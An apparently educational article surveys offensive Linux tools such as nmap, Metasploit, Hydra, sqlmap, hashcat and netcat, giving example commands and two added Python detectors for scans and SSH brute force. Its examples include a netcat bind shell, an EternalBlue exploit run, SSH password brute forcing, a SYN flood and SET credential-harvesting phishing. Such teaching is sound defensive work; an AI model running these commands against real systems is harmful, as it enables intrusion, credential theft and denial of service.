Offensive Linux security tools are primarily used for penetration testing, ethical hacking, vulnerability assessment, and exploiting system weaknesses. These tools help security professionals identify vulnerabilities in Linux systems before malicious actors can exploit them. Below are some of the most commonly used offensive Linux security tools, along with their examples and usage.
### 1. **Nmap**
**Nmap (Network Mapper)** is a popular network scanning tool used to discover hosts and services on a network, and it’s often used to identify open ports, services, and vulnerabilities.
- **Example: Scan a specific IP range for open ports**
```bash
nmap -sS 192.168.1.0/24
```
This command performs a TCP SYN (half-open) scan of every host in the 192.168.1.0/24 range to identify which ports are open. `-sS` needs raw-socket privileges, so run it as root; without them nmap silently falls back to a full TCP connect scan (`-sT`), which completes the handshake and is therefore more visible in the target's logs.
- **Example: Scan for version detection and OS fingerprinting**
```bash
nmap -sV -O 192.168.1.10
```
This command probes each open port to detect the service and its version (`-sV`) and fingerprints the target's TCP/IP stack to guess the operating system (`-O`, which also needs root).
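Both nmap commands above produce a burst of SYN packets that a firewall's LOG rule records. The following detector, added here as an example and not part of the original page, parses constructed netfilter log lines and flags the two scan shapes: a vertical scan (one host, many ports) and a horizontal sweep (one port across a /24, as `nmap -sS 192.168.1.0/24` does). The log lines, the `SYN-IN:` prefix, and the thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

def _mk(sec, src, dst, dport):  # builds one constructed netfilter log line (LOG target)
    return (f"Jun 10 12:00:{sec:02d} gw kernel: SYN-IN: IN=eth0 OUT= SRC={src} DST={dst} "
            f"LEN=60 TTL=64 PROTO=TCP SPT={50000 + sec} DPT={dport} WINDOW=1024 SYN")

SCAN_PORTS = [21, 22, 23, 25, 53, 80, 110, 139, 143, 443, 445, 3389]
SAMPLE_LOG = "\n".join(  # constructed sample, not from the page
    [_mk(i, "192.168.1.77", "192.168.1.10", p) for i, p in enumerate(SCAN_PORTS)]    # one host, many ports
    + [_mk(i, "10.0.0.5", f"192.168.1.{h}", 445) for i, h in enumerate(range(1, 13))]  # many hosts, one port
    + [_mk(s, "192.168.1.20", "192.168.1.10", 22) for s in (3, 9, 30)]                 # ordinary SSH user
    + ["Jun 10 12:00:05 gw sshd[99]: Accepted publickey for alice from 192.168.1.20 port 50003 ssh2"]
)

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} \d{2} \d{2}:\d{2}:\d{2}) \S+ kernel: .*?SRC=(?P<src>[\d.]+) "
    r"DST=(?P<dst>[\d.]+).*?PROTO=TCP SPT=\d+ DPT=(?P<dport>\d+)"
)

def parse_syn_events(text):
    """Return (timestamp, src, dst, dport) for every logged inbound SYN."""
    found = (LINE_RE.search(line) for line in text.splitlines())
    return [(datetime.strptime(m["ts"], "%b %d %H:%M:%S"), m["src"], m["dst"], int(m["dport"]))
            for m in found if m]

def detect_scans(events, min_ports=10, min_hosts=10):
    """Per (source, minute): 'vertical' = >= min_ports distinct ports on one host (nmap -sS host),
    'horizontal' = >= min_hosts distinct hosts on one port (nmap -sS 192.168.1.0/24 sweep)."""
    ports = defaultdict(set)  # (src, minute, dst)   -> destination ports hit
    hosts = defaultdict(set)  # (src, minute, dport) -> destination hosts hit
    for ts, src, dst, dport in events:
        minute = ts.replace(second=0)
        ports[(src, minute, dst)].add(dport)
        hosts[(src, minute, dport)].add(dst)
    findings = {}
    for (src, _, dst), p in ports.items():
        if len(p) >= min_ports:
            findings[src] = ("vertical", dst, len(p))
    for (src, _, dport), h in hosts.items():
        if len(h) >= min_hosts:
            findings[src] = ("horizontal", dport, len(h))
    return findings
```

The ordinary user who opened three SSH sessions in the same minute is not flagged; only the two sources whose distinct-port or distinct-host count crosses the threshold are.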
### 2. **Metasploit**
**Metasploit** is a widely used framework for developing, testing, and executing exploits against a target system.
- **Example: Launch a basic exploit using Metasploit**
```bash
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
exploit
```
This runs the MS17-010 (EternalBlue) SMB exploit module against an unpatched Windows host. The target option is `RHOSTS` (it accepts a single address or a range); check the module's remaining required options with `show options` before running `exploit`.
### 3. **Hydra**
**Hydra** is a fast and flexible online password-guessing tool used to brute-force logins on network services like SSH, FTP, and HTTP.
- **Example: Brute force attack on SSH**
```bash
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.10
```
This command tries every entry of the RockYou password list (`-P`) as the password for the single username `root` (`-l`) against SSH on 192.168.1.10. Each guess is a real login attempt, so the run appears as a burst of failed logins in the target's auth log and will trigger lockout or rate limiting where it is configured.
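The burst of failed logins that a Hydra run leaves behind is easy to spot in sshd's log. The following analyser is an added example, not part of the original page: it parses constructed auth.log lines, flags sources with a burst of failures inside a time window, distinguishes a single-user brute force from a password spray across many users, and marks the case that needs incident response, a success following the failures. The sample lines, window and thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

AUTH_RE = re.compile(  # real sshd wording for both outcomes, incl. "invalid user" failures
    r"^(?P<ts>\w{3} \d{2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) "
    r"(?:password|publickey) for (?:invalid user )?(?P<user>\S+) from (?P<src>[\d.]+) port \d+"
)

def _line(sec, result, user, src, invalid=False):  # builds one constructed auth.log line
    return (f"Jun 10 12:01:{sec:02d} host sshd[{2000 + sec}]: {result} password for "
            f"{'invalid user ' if invalid else ''}{user} from {src} port {50000 + sec} ssh2")

SAMPLE_AUTH = "\n".join(  # constructed sample, not from the page: three sources
    [_line(s, "Failed", "root", "192.168.1.77") for s in range(8)]          # one user, many tries
    + [_line(8, "Accepted", "root", "192.168.1.77")]                       # ...and a guess landed
    + [_line(20 + i, "Failed", u, "10.0.0.9", invalid=True)                # many users, one try each
       for i, u in enumerate(["admin", "test", "oracle", "ubuntu", "pi", "git"])]
    + [_line(40, "Failed", "alice", "192.168.1.20"), _line(45, "Accepted", "alice", "192.168.1.20")]
)

def parse_auth(text):
    """Return (timestamp, result, user, src) for each sshd login outcome."""
    found = (AUTH_RE.search(line) for line in text.splitlines())
    return [(datetime.strptime(m["ts"], "%b %d %H:%M:%S"), m["result"], m["user"], m["src"])
            for m in found if m]

def _max_in_window(times, window):  # most timestamps inside any window-second span
    best = start = 0
    for end in range(len(times)):
        while (times[end] - times[start]).total_seconds() > window:
            start += 1
        best = max(best, end - start + 1)
    return best

def analyse(events, window_seconds=300, min_failures=5, spray_users=3):
    """Flag sources with a burst of failures, classify brute force vs spray, and
    note whether a success followed the failures (the case that needs IR)."""
    by_src = defaultdict(list)
    for ev in sorted(events):
        by_src[ev[3]].append(ev)
    findings = {}
    for src, evs in by_src.items():
        fails = [e for e in evs if e[1] == "Failed"]
        if not fails or _max_in_window([e[0] for e in fails], window_seconds) < min_failures:
            continue
        users = sorted({e[2] for e in fails})
        findings[src] = {"kind": "password-spray" if len(users) >= spray_users else "brute-force",
                         "failures": len(fails), "users": users,
                         "success_after_failures": any(e[1] == "Accepted" and e[0] >= fails[0][0] for e in evs)}
    return findings
```

A user who mistypes a password once and then logs in is not flagged; the Hydra-style source is reported as a brute force whose guess succeeded.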
### 4. **Nikto**
**Nikto** is an open-source web server scanner that looks for vulnerabilities such as outdated software, dangerous files, or misconfigurations.
- **Example: Scan a website for vulnerabilities**
```bash
nikto -h http://example.com
```
This command scans the target website for known vulnerabilities and potential security issues.
### 5. **John the Ripper**
**John the Ripper** is a fast password-cracking tool that supports a wide range of password hash formats. It’s often used to crack password hashes recovered from a system.
- **Example: Crack a password hash**
```bash
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```
This command tries each word of the RockYou wordlist against the hashes in `hash.txt`. John auto-detects the hash format; pass `--format=<type>` when detection is ambiguous, and run `john --show hash.txt` to print the passwords it has already cracked.
### 6. **Wireshark**
**Wireshark** is a network protocol analyzer that captures and inspects packets in real time, useful for intercepting and analyzing network traffic.
- **Example: Capture all traffic on a specific interface**
```bash
wireshark -i eth0 -k
```
This opens Wireshark on the `eth0` interface and starts capturing immediately (`-k`); without `-k` the GUI only preselects the interface. Capturing needs root or membership in the `wireshark` group, which grants `dumpcap` the required capabilities. The captured packets can then be inspected for cleartext credentials, unexpected protocols, or conversations between hosts that should not be talking to each other.
### 7. **Aircrack-ng**
**Aircrack-ng** is a suite of tools used for assessing Wi-Fi network security. It’s often used for cracking WEP/WPA-PSK keys.
- **Example: Crack a WEP key**
```bash
airodump-ng -w capturefile wlan0
aircrack-ng -b [BSSID] capturefile-01.cap
```
The first command captures wireless frames on `wlan0` (the interface must first be in monitor mode, e.g. via `airmon-ng start wlan0`) and writes them to `capturefile-01.cap`; the second attempts to recover the WEP key of the network with the given BSSID from that file. WEP has been broken for years, which is why this works at all: any network still using it should be moved to WPA2 or WPA3.
### 8. **sqlmap**
**sqlmap** is an open-source tool used to detect and exploit SQL injection vulnerabilities in web applications.
- **Example: Exploit SQL injection vulnerability**
```bash
sqlmap -u "http://example.com/page?id=1" --dbs
```
This command tests the `id` parameter of the given URL for SQL injection and, if it is injectable, enumerates the names of the available databases (`--dbs`).
### 9. **Hashcat**
**Hashcat** is a fast password recovery tool that supports a wide variety of hashing algorithms, including MD5, SHA1, SHA256, and more.
- **Example: Crack a hash using a dictionary attack**
```bash
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
```
This command attempts to crack the hashes in `hash.txt` with the RockYou wordlist. `-m 0` selects the hash mode (0 is raw MD5; a run handles one mode, so pick the one matching your hashes) and `-a 0` is straight dictionary mode.
### 10. **Burp Suite**
**Burp Suite** is a web application security testing tool that lets penetration testers intercept, modify and replay HTTP traffic to test for vulnerabilities such as SQL injection, XSS, and CSRF.
- **Example: Intercept HTTP traffic**
Configure your browser to use Burp's proxy listener (by default 127.0.0.1:8080) as its HTTP proxy; to intercept HTTPS you must also install Burp's CA certificate in the browser's trust store. Intercepted requests and responses can then be inspected and modified to identify web vulnerabilities.
### 11. **Netcat (nc)**
**Netcat** is a versatile networking tool used for creating TCP/UDP connections, and it’s often used for port scanning, banner grabbing, and establishing backdoors.
- **Example: Open a bind shell**
On the target machine:
```bash
nc -lvp 4444 -e /bin/bash
```
On the attacking machine:
```bash
nc [target_ip] 4444
```
This is a bind shell: the target listens on port 4444 and hands the connection to `/bin/bash`, and the attacker connects in to control the machine (a reverse shell is the opposite direction, with the target connecting out to the attacker). The `-e` option exists only in some netcat variants (nc.traditional, ncat); the OpenBSD netcat shipped by most distributions lacks it. To a defender, this looks like an unexpected listening socket owned by a shell process in `ss -ltnp`.
### 12. **Social-Engineer Toolkit (SET)**
**SET** is a framework designed for social engineering attacks, such as phishing, credential harvesting, and email spoofing.
- **Example: Create a phishing site**
```bash
setoolkit
```
Select the website attack vectors, choose the credential harvester method and the site to clone; SET serves the cloned page and records any credentials entered into it.
### 13. **hping3**
**hping3** is a command-line packet crafting tool used to generate custom network packets for testing firewall rules, detecting open ports, and performing DoS attacks.
- **Example: Perform a SYN flood attack**
```bash
hping3 -S --flood -V -p 80 [target_ip]
```
This sends a continuous stream of SYN packets (`--flood`, as fast as possible; `-V` is verbose) to port 80 on the target, potentially exhausting its half-open connection table and causing a denial of service. SYN cookies (`net.ipv4.tcp_syncookies=1` on Linux) are the standard kernel-side mitigation.
### 14. **Sn1per**
**Sn1per** is an automated scanner used for vulnerability assessments and penetration testing.
- **Example: Perform a full scan**
```bash
sniper -t [target_ip]
```
This command runs Sn1per's default scan against the target IP, which chains port scanning, service enumeration, and web vulnerability checks.
### 15. **Exploit-DB**
**Exploit Database (Exploit-DB)** is a repository for public exploits and vulnerabilities, used by security researchers to find and test known vulnerabilities.
- **Example: Search for a specific exploit**
```bash
searchsploit apache
```
This command searches the local copy of the Exploit-DB archive for entries mentioning Apache. Keep the copy current with `searchsploit -u`, and use `searchsploit -x <id>` to view an entry.
---
### Common Use-Cases:
1. **Network Scanning**: Nmap, Netcat, Wireshark, hping3
2. **Web Application Testing**: Burp Suite, Nikto, sqlmap, OWASP ZAP
3. **Password Cracking**: John the Ripper, Hydra, Hashcat
4. **Wi-Fi Penetration Testing**: Aircrack-ng
5. **Exploitation**: Metasploit, Sn1per
6. **Social Engineering**: Social-Engineer Toolkit (SET)
These tools, when used responsibly by security professionals, are crucial for identifying vulnerabilities, securing systems, and ensuring compliance with security best practices. They should only be used in legal environments with proper authorization.